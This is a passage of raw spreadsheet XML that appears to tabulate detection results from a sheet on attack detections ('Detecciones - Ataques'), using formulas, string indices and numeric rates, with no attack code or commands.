      <c r="AW35" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX35" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="60.0" customHeight="1">
      <c r="B36" s="142" t="s">
        <v>262</v>
      </c>
      <c r="C36" s="143" t="s">
        <v>397</v>
      </c>
      <c r="D36" s="143" t="s">
        <v>398</v>
      </c>
      <c r="E36" s="145" t="s">
        <v>402</v>
      </c>
      <c r="F36" s="280">
        <f>'(B) - Detecciones - Ataques'!P27</f>
        <v>1</v>
      </c>
      <c r="G36" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ27</f>
        <v>0</v>
      </c>
      <c r="H36" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ27</f>
        <v>0</v>
      </c>
      <c r="I36" s="271">
        <f>'(B) - Detecciones - Ataques'!AS27</f>
        <v>0</v>
      </c>
      <c r="J36" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ27</f>
        <v>0</v>
      </c>
      <c r="K36" s="271">
        <f>'(B) - Detecciones - Ataques'!BP27</f>
        <v>0</v>
      </c>
      <c r="L36" s="281">
        <f>'(B) - Detecciones - Ataques'!BW27</f>
        <v>0</v>
      </c>
      <c r="M36" s="271">
        <f>'(B) - Detecciones - Ataques'!CM27</f>
        <v>0</v>
      </c>
      <c r="N36" s="281">
        <f>'(B) - Detecciones - Ataques'!CT27</f>
        <v>0</v>
      </c>
      <c r="O36" s="280">
        <f>'(B) - Detecciones - Ataques'!EC27</f>
        <v>0</v>
      </c>
      <c r="P36" s="281">
        <f>'(B) - Detecciones - Ataques'!ED27</f>
        <v>0</v>
      </c>
      <c r="Q36" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AB36" s="55" t="s">
        <v>31</v>
      </c>
      <c r="AC36" s="270" t="s">
        <v>1508</v>
      </c>
      <c r="AD36" s="70" t="s">
        <v>1503</v>
      </c>
      <c r="AE36" s="70" t="s">
        <v>1502</v>
      </c>
      <c r="AF36" s="297"/>
      <c r="AL36" s="287" t="s">
        <v>613</v>
      </c>
      <c r="AM36" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN36" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO36" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP36" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ36" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS36" s="287" t="s">
        <v>613</v>
      </c>
      <c r="AT36" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU36" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV36" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW36" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX36" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="60.0" customHeight="1">
      <c r="B37" s="142" t="s">
        <v>262</v>
      </c>
      <c r="C37" s="143" t="s">
        <v>397</v>
      </c>
      <c r="D37" s="143" t="s">
        <v>406</v>
      </c>
      <c r="E37" s="145" t="s">
        <v>1509</v>
      </c>
      <c r="F37" s="280">
        <f>'(B) - Detecciones - Ataques'!P28</f>
        <v>1</v>
      </c>
      <c r="G37" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ28</f>
        <v>0</v>
      </c>
      <c r="H37" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ28</f>
        <v>0</v>
      </c>
      <c r="I37" s="271">
        <f>'(B) - Detecciones - Ataques'!AS28</f>
        <v>0</v>
      </c>
      <c r="J37" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ28</f>
        <v>0</v>
      </c>
      <c r="K37" s="271">
        <f>'(B) - Detecciones - Ataques'!BP28</f>
        <v>0</v>
      </c>
      <c r="L37" s="281">
        <f>'(B) - Detecciones - Ataques'!BW28</f>
        <v>0</v>
      </c>
      <c r="M37" s="271">
        <f>'(B) - Detecciones - Ataques'!CM28</f>
        <v>0</v>
      </c>
      <c r="N37" s="281">
        <f>'(B) - Detecciones - Ataques'!CT28</f>
        <v>0</v>
      </c>
      <c r="O37" s="280">
        <f>'(B) - Detecciones - Ataques'!EC28</f>
        <v>0</v>
      </c>
      <c r="P37" s="281">
        <f>'(B) - Detecciones - Ataques'!ED28</f>
        <v>0</v>
      </c>
      <c r="Q37" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AB37" s="275" t="s">
        <v>97</v>
      </c>
      <c r="AC37" s="275">
        <f t="shared" ref="AC37:AC49" si="22">COUNTIFS($Q$12:$Q$137,"✔",$B$12:$B$137,AB37)+COUNTIFS($Q$12:$Q$137,"✔",$C$12:$C$137,AB37)</f>
        <v>5</v>
      </c>
      <c r="AD37" s="284">
        <f t="shared" ref="AD37:AD49" si="23">(SUMIFS($H$12:$H$137,$Q$12:$Q$137,"✔",$B$12:$B$137,$AB37)+SUMIFS($H$12:$H$137,$Q$12:$Q$137,"✔",$C$12:$C$137,$AB37))/$AC37</f>
        <v>0.2101001378</v>
      </c>
      <c r="AE37" s="284">
        <f t="shared" ref="AE37:AE49" si="24">(SUMIFS($P$12:$P$137,$Q$12:$Q$137,"✔",$B$12:$B$137,$AB37)+SUMIFS($P$12:$P$137,$Q$12:$Q$137,"✔",$C$12:$C$137,$AB37))/$AC37</f>
        <v>0.001887997139</v>
      </c>
      <c r="AF37" s="298"/>
      <c r="AL37" s="287" t="s">
        <v>627</v>
      </c>
      <c r="AM37" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN37" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO37" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP37" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ37" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS37" s="287" t="s">
        <v>627</v>
      </c>
      <c r="AT37" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU37" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV37" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW37" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX37" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="38" ht="60.0" customHeight="1">
      <c r="B38" s="142" t="s">
        <v>262</v>
      </c>
      <c r="C38" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D38" s="143" t="s">
        <v>421</v>
      </c>
      <c r="E38" s="145" t="s">
        <v>1510</v>
      </c>
      <c r="F38" s="280">
        <f>'(B) - Detecciones - Ataques'!P29</f>
        <v>1</v>
      </c>
      <c r="G38" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ29</f>
        <v>1</v>
      </c>
      <c r="H38" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ29</f>
        <v>1</v>
      </c>
      <c r="I38" s="271">
        <f>'(B) - Detecciones - Ataques'!AS29</f>
        <v>0</v>
      </c>
      <c r="J38" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ29</f>
        <v>0</v>
      </c>
      <c r="K38" s="271">
        <f>'(B) - Detecciones - Ataques'!BP29</f>
        <v>1</v>
      </c>
      <c r="L38" s="281">
        <f>'(B) - Detecciones - Ataques'!BW29</f>
        <v>1</v>
      </c>
      <c r="M38" s="271">
        <f>'(B) - Detecciones - Ataques'!CM29</f>
        <v>1</v>
      </c>
      <c r="N38" s="281">
        <f>'(B) - Detecciones - Ataques'!CT29</f>
        <v>1</v>
      </c>
      <c r="O38" s="280">
        <f>'(B) - Detecciones - Ataques'!EC29</f>
        <v>1</v>
      </c>
      <c r="P38" s="281">
        <f>'(B) - Detecciones - Ataques'!ED29</f>
        <v>1</v>
      </c>
      <c r="Q38" s="282" t="s">
        <v>13</v>
      </c>
      <c r="Y38" s="299"/>
      <c r="AB38" s="275" t="s">
        <v>204</v>
      </c>
      <c r="AC38" s="275">
        <f t="shared" si="22"/>
        <v>1</v>
      </c>
      <c r="AD38" s="284">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="AE38" s="284">
        <f t="shared" si="24"/>
        <v>153</v>
      </c>
      <c r="AF38" s="298"/>
      <c r="AL38" s="287" t="s">
        <v>634</v>
      </c>
      <c r="AM38" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN38" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO38" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP38" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ38" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS38" s="287" t="s">
        <v>634</v>
      </c>
      <c r="AT38" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU38" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV38" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW38" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX38" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="39" ht="60.0" customHeight="1">
      <c r="B39" s="142" t="s">
        <v>262</v>
      </c>
      <c r="C39" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D39" s="143" t="s">
        <v>421</v>
      </c>
      <c r="E39" s="145" t="s">
        <v>1511</v>
      </c>
      <c r="F39" s="280">
        <f>'(B) - Detecciones - Ataques'!P30</f>
        <v>1</v>
      </c>
      <c r="G39" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ30</f>
        <v>1</v>
      </c>
      <c r="H39" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ30</f>
        <v>1</v>
      </c>
      <c r="I39" s="271">
        <f>'(B) - Detecciones - Ataques'!AS30</f>
        <v>0</v>
      </c>
      <c r="J39" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ30</f>
        <v>0</v>
      </c>
      <c r="K39" s="271">
        <f>'(B) - Detecciones - Ataques'!BP30</f>
        <v>0</v>
      </c>
      <c r="L39" s="281">
        <f>'(B) - Detecciones - Ataques'!BW30</f>
        <v>0</v>
      </c>
      <c r="M39" s="271">
        <f>'(B) - Detecciones - Ataques'!CM30</f>
        <v>1</v>
      </c>
      <c r="N39" s="281">
        <f>'(B) - Detecciones - Ataques'!CT30</f>
        <v>1</v>
      </c>
      <c r="O39" s="280">
        <f>'(B) - Detecciones - Ataques'!EC30</f>
        <v>0</v>
      </c>
      <c r="P39" s="281">
        <f>'(B) - Detecciones - Ataques'!ED30</f>
        <v>0</v>
      </c>
      <c r="Q39" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AB39" s="275" t="s">
        <v>261</v>
      </c>
      <c r="AC39" s="275">
        <f t="shared" si="22"/>
        <v>8</v>
      </c>
      <c r="AD39" s="284">
        <f t="shared" si="23"/>
        <v>0.3133333333</v>
      </c>
      <c r="AE39" s="284">
        <f t="shared" si="24"/>
        <v>0.6784649123</v>
      </c>
      <c r="AF39" s="298"/>
      <c r="AL39" s="287" t="s">
        <v>645</v>
      </c>
      <c r="AM39" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN39" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO39" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP39" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ39" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS39" s="287" t="s">
        <v>645</v>
      </c>
      <c r="AT39" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU39" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV39" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW39" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX39" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="40" ht="60.0" customHeight="1">
      <c r="B40" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C40" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D40" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E40" s="145" t="s">
        <v>1512</v>
      </c>
      <c r="F40" s="280">
        <f>'(B) - Detecciones - Ataques'!P31</f>
        <v>1</v>
      </c>
      <c r="G40" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ31</f>
        <v>0</v>
      </c>
      <c r="H40" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ31</f>
        <v>0</v>
      </c>
      <c r="I40" s="271">
        <f>'(B) - Detecciones - Ataques'!AS31</f>
        <v>0</v>
      </c>
      <c r="J40" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ31</f>
        <v>0</v>
      </c>
      <c r="K40" s="271">
        <f>'(B) - Detecciones - Ataques'!BP31</f>
        <v>0</v>
      </c>
      <c r="L40" s="281">
        <f>'(B) - Detecciones - Ataques'!BW31</f>
        <v>0</v>
      </c>
      <c r="M40" s="271">
        <f>'(B) - Detecciones - Ataques'!CM31</f>
        <v>0</v>
      </c>
      <c r="N40" s="281">
        <f>'(B) - Detecciones - Ataques'!CT31</f>
        <v>0</v>
      </c>
      <c r="O40" s="280">
        <f>'(B) - Detecciones - Ataques'!EC31</f>
        <v>0</v>
      </c>
      <c r="P40" s="281">
        <f>'(B) - Detecciones - Ataques'!ED31</f>
        <v>0</v>
      </c>
      <c r="Q40" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB40" s="275" t="s">
        <v>262</v>
      </c>
      <c r="AC40" s="275">
        <f t="shared" si="22"/>
        <v>5</v>
      </c>
      <c r="AD40" s="284">
        <f t="shared" si="23"/>
        <v>0.6</v>
      </c>
      <c r="AE40" s="284">
        <f t="shared" si="24"/>
        <v>0.2</v>
      </c>
      <c r="AF40" s="298"/>
      <c r="AL40" s="287" t="s">
        <v>660</v>
      </c>
      <c r="AM40" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN40" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO40" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP40" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ40" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS40" s="287" t="s">
        <v>660</v>
      </c>
      <c r="AT40" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU40" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV40" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW40" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX40" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="41" ht="60.0" customHeight="1">
      <c r="B41" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C41" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D41" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E41" s="145" t="s">
        <v>463</v>
      </c>
      <c r="F41" s="280">
        <f>'(B) - Detecciones - Ataques'!P32</f>
        <v>1</v>
      </c>
      <c r="G41" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ32</f>
        <v>0</v>
      </c>
      <c r="H41" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ32</f>
        <v>0</v>
      </c>
      <c r="I41" s="271">
        <f>'(B) - Detecciones - Ataques'!AS32</f>
        <v>0</v>
      </c>
      <c r="J41" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ32</f>
        <v>0</v>
      </c>
      <c r="K41" s="271">
        <f>'(B) - Detecciones - Ataques'!BP32</f>
        <v>0</v>
      </c>
      <c r="L41" s="281">
        <f>'(B) - Detecciones - Ataques'!BW32</f>
        <v>0</v>
      </c>
      <c r="M41" s="271">
        <f>'(B) - Detecciones - Ataques'!CM32</f>
        <v>0</v>
      </c>
      <c r="N41" s="281">
        <f>'(B) - Detecciones - Ataques'!CT32</f>
        <v>0</v>
      </c>
      <c r="O41" s="280">
        <f>'(B) - Detecciones - Ataques'!EC32</f>
        <v>0</v>
      </c>
      <c r="P41" s="281">
        <f>'(B) - Detecciones - Ataques'!ED32</f>
        <v>0</v>
      </c>
      <c r="Q41" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB41" s="275" t="s">
        <v>450</v>
      </c>
      <c r="AC41" s="275">
        <f t="shared" si="22"/>
        <v>7</v>
      </c>
      <c r="AD41" s="284">
        <f t="shared" si="23"/>
        <v>0.2857142857</v>
      </c>
      <c r="AE41" s="284">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="AF41" s="298"/>
      <c r="AL41" s="287" t="s">
        <v>674</v>
      </c>
      <c r="AM41" s="275">
        <f t="shared" si="9"/>
        <v>80377</v>
      </c>
      <c r="AN41" s="275">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="AO41" s="284">
        <f t="shared" si="11"/>
        <v>0.00002488274009</v>
      </c>
      <c r="AP41" s="275">
        <f t="shared" si="12"/>
        <v>350</v>
      </c>
      <c r="AQ41" s="285">
        <f t="shared" si="13"/>
        <v>0.004354479515</v>
      </c>
      <c r="AS41" s="287" t="s">
        <v>674</v>
      </c>
      <c r="AT41" s="275">
        <f t="shared" si="14"/>
        <v>80226</v>
      </c>
      <c r="AU41" s="275">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="AV41" s="284">
        <f t="shared" si="21"/>
        <v>0.00002492957395</v>
      </c>
      <c r="AW41" s="275">
        <f t="shared" si="17"/>
        <v>350</v>
      </c>
      <c r="AX41" s="285">
        <f t="shared" si="18"/>
        <v>0.004362675442</v>
      </c>
    </row>
    <row r="42" ht="60.0" customHeight="1">
      <c r="B42" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C42" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D42" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E42" s="145" t="s">
        <v>468</v>
      </c>
      <c r="F42" s="280">
        <f>'(B) - Detecciones - Ataques'!P33</f>
        <v>1</v>
      </c>
      <c r="G42" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ33</f>
        <v>1</v>
      </c>
      <c r="H42" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ33</f>
        <v>1</v>
      </c>
      <c r="I42" s="271">
        <f>'(B) - Detecciones - Ataques'!AS33</f>
        <v>0</v>
      </c>
      <c r="J42" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ33</f>
        <v>0</v>
      </c>
      <c r="K42" s="271">
        <f>'(B) - Detecciones - Ataques'!BP33</f>
        <v>0</v>
      </c>
      <c r="L42" s="281">
        <f>'(B) - Detecciones - Ataques'!BW33</f>
        <v>0</v>
      </c>
      <c r="M42" s="271">
        <f>'(B) - Detecciones - Ataques'!CM33</f>
        <v>1</v>
      </c>
      <c r="N42" s="281">
        <f>'(B) - Detecciones - Ataques'!CT33</f>
        <v>1</v>
      </c>
      <c r="O42" s="280">
        <f>'(B) - Detecciones - Ataques'!EC33</f>
        <v>0</v>
      </c>
      <c r="P42" s="281">
        <f>'(B) - Detecciones - Ataques'!ED33</f>
        <v>0</v>
      </c>
      <c r="Q42" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB42" s="275" t="s">
        <v>534</v>
      </c>
      <c r="AC42" s="275">
        <f t="shared" si="22"/>
        <v>6</v>
      </c>
      <c r="AD42" s="284">
        <f t="shared" si="23"/>
        <v>0.3333333333</v>
      </c>
      <c r="AE42" s="284">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="AF42" s="298"/>
      <c r="AL42" s="287" t="s">
        <v>756</v>
      </c>
      <c r="AM42" s="275">
        <f t="shared" si="9"/>
        <v>10</v>
      </c>
      <c r="AN42" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO42" s="284">
        <f t="shared" si="11"/>
        <v>0.1</v>
      </c>
      <c r="AP42" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ42" s="285">
        <f t="shared" si="13"/>
        <v>0.1</v>
      </c>
      <c r="AS42" s="287" t="s">
        <v>756</v>
      </c>
      <c r="AT42" s="275">
        <f t="shared" si="14"/>
        <v>7</v>
      </c>
      <c r="AU42" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV42" s="284">
        <f t="shared" si="21"/>
        <v>0.1428571429</v>
      </c>
      <c r="AW42" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX42" s="285">
        <f t="shared" si="18"/>
        <v>0.1428571429</v>
      </c>
    </row>
    <row r="43" ht="60.0" customHeight="1">
      <c r="B43" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C43" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D43" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E43" s="145" t="s">
        <v>477</v>
      </c>
      <c r="F43" s="280">
        <f>'(B) - Detecciones - Ataques'!P34</f>
        <v>1</v>
      </c>
      <c r="G43" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ34</f>
        <v>0</v>
      </c>
      <c r="H43" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ34</f>
        <v>0</v>
      </c>
      <c r="I43" s="271">
        <f>'(B) - Detecciones - Ataques'!AS34</f>
        <v>0</v>
      </c>
      <c r="J43" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ34</f>
        <v>0</v>
      </c>
      <c r="K43" s="271">
        <f>'(B) - Detecciones - Ataques'!BP34</f>
        <v>0</v>
      </c>
      <c r="L43" s="281">
        <f>'(B) - Detecciones - Ataques'!BW34</f>
        <v>0</v>
      </c>
      <c r="M43" s="271">
        <f>'(B) - Detecciones - Ataques'!CM34</f>
        <v>0</v>
      </c>
      <c r="N43" s="281">
        <f>'(B) - Detecciones - Ataques'!CT34</f>
        <v>0</v>
      </c>
      <c r="O43" s="280">
        <f>'(B) - Detecciones - Ataques'!EC34</f>
        <v>0</v>
      </c>
      <c r="P43" s="281">
        <f>'(B) - Detecciones - Ataques'!ED34</f>
        <v>0</v>
      </c>
      <c r="Q43" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB43" s="275" t="s">
        <v>658</v>
      </c>
      <c r="AC43" s="275">
        <f t="shared" si="22"/>
        <v>17</v>
      </c>
      <c r="AD43" s="284">
        <f t="shared" si="23"/>
        <v>0.1764713215</v>
      </c>
      <c r="AE43" s="284">
        <f t="shared" si="24"/>
        <v>0.1179037124</v>
      </c>
      <c r="AF43" s="298"/>
      <c r="AL43" s="287" t="s">
        <v>825</v>
      </c>
      <c r="AM43" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN43" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO43" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP43" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ43" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS43" s="287" t="s">
        <v>825</v>
      </c>
      <c r="AT43" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU43" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV43" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW43" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX43" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="44" ht="60.0" customHeight="1">
      <c r="B44" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C44" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D44" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E44" s="145" t="s">
        <v>486</v>
      </c>
      <c r="F44" s="280">
        <f>'(B) - Detecciones - Ataques'!P35</f>
        <v>1</v>
      </c>
      <c r="G44" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ35</f>
        <v>0</v>
      </c>
      <c r="H44" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ35</f>
        <v>0</v>
      </c>
      <c r="I44" s="271">
        <f>'(B) - Detecciones - Ataques'!AS35</f>
        <v>0</v>
      </c>
      <c r="J44" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ35</f>
        <v>0</v>
      </c>
      <c r="K44" s="271">
        <f>'(B) - Detecciones - Ataques'!BP35</f>
        <v>0</v>
      </c>
      <c r="L44" s="281">
        <f>'(B) - Detecciones - Ataques'!BW35</f>
        <v>0</v>
      </c>
      <c r="M44" s="271">
        <f>'(B) - Detecciones - Ataques'!CM35</f>
        <v>0</v>
      </c>
      <c r="N44" s="281">
        <f>'(B) - Detecciones - Ataques'!CT35</f>
        <v>0</v>
      </c>
      <c r="O44" s="280">
        <f>'(B) - Detecciones - Ataques'!EC35</f>
        <v>0</v>
      </c>
      <c r="P44" s="281">
        <f>'(B) - Detecciones - Ataques'!ED35</f>
        <v>0</v>
      </c>
      <c r="Q44" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB44" s="275" t="s">
        <v>351</v>
      </c>
      <c r="AC44" s="275">
        <f t="shared" si="22"/>
        <v>7</v>
      </c>
      <c r="AD44" s="284">
        <f t="shared" si="23"/>
        <v>0.2857142857</v>
      </c>
      <c r="AE44" s="284">
        <f t="shared" si="24"/>
        <v>0.4285714286</v>
      </c>
      <c r="AF44" s="298"/>
      <c r="AL44" s="287" t="s">
        <v>834</v>
      </c>
      <c r="AM44" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN44" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO44" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP44" s="275">
        <f t="shared" si="12"/>
        <v>10</v>
      </c>
      <c r="AQ44" s="285">
        <f t="shared" si="13"/>
        <v>10</v>
      </c>
      <c r="AS44" s="287" t="s">
        <v>834</v>
      </c>
      <c r="AT44" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU44" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV44" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW44" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX44" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="45" ht="60.0" customHeight="1">
      <c r="B45" s="142" t="s">
        <v>450</v>
      </c>
      <c r="C45" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D45" s="143" t="s">
        <v>452</v>
      </c>
      <c r="E45" s="145" t="s">
        <v>496</v>
      </c>
      <c r="F45" s="280">
        <f>'(B) - Detecciones - Ataques'!P36</f>
        <v>1</v>
      </c>
      <c r="G45" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ36</f>
        <v>0</v>
      </c>
      <c r="H45" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ36</f>
        <v>0</v>
      </c>
      <c r="I45" s="271">
        <f>'(B) - Detecciones - Ataques'!AS36</f>
        <v>0</v>
      </c>
      <c r="J45" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ36</f>
        <v>0</v>
      </c>
      <c r="K45" s="271">
        <f>'(B) - Detecciones - Ataques'!BP36</f>
        <v>0</v>
      </c>
      <c r="L45" s="281">
        <f>'(B) - Detecciones - Ataques'!BW36</f>
        <v>0</v>
      </c>
      <c r="M45" s="271">
        <f>'(B) - Detecciones - Ataques'!CM36</f>
        <v>0</v>
      </c>
      <c r="N45" s="281">
        <f>'(B) - Detecciones - Ataques'!CT36</f>
        <v>0</v>
      </c>
      <c r="O45" s="280">
        <f>'(B) - Detecciones - Ataques'!EC36</f>
        <v>0</v>
      </c>
      <c r="P45" s="281">
        <f>'(B) - Detecciones - Ataques'!ED36</f>
        <v>0</v>
      </c>
      <c r="Q45" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB45" s="275" t="s">
        <v>397</v>
      </c>
      <c r="AC45" s="275">
        <f t="shared" si="22"/>
        <v>6</v>
      </c>
      <c r="AD45" s="284">
        <f t="shared" si="23"/>
        <v>0.1666666667</v>
      </c>
      <c r="AE45" s="284">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="AF45" s="298"/>
      <c r="AL45" s="287" t="s">
        <v>842</v>
      </c>
      <c r="AM45" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN45" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO45" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP45" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ45" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS45" s="287" t="s">
        <v>842</v>
      </c>
      <c r="AT45" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU45" s="275">
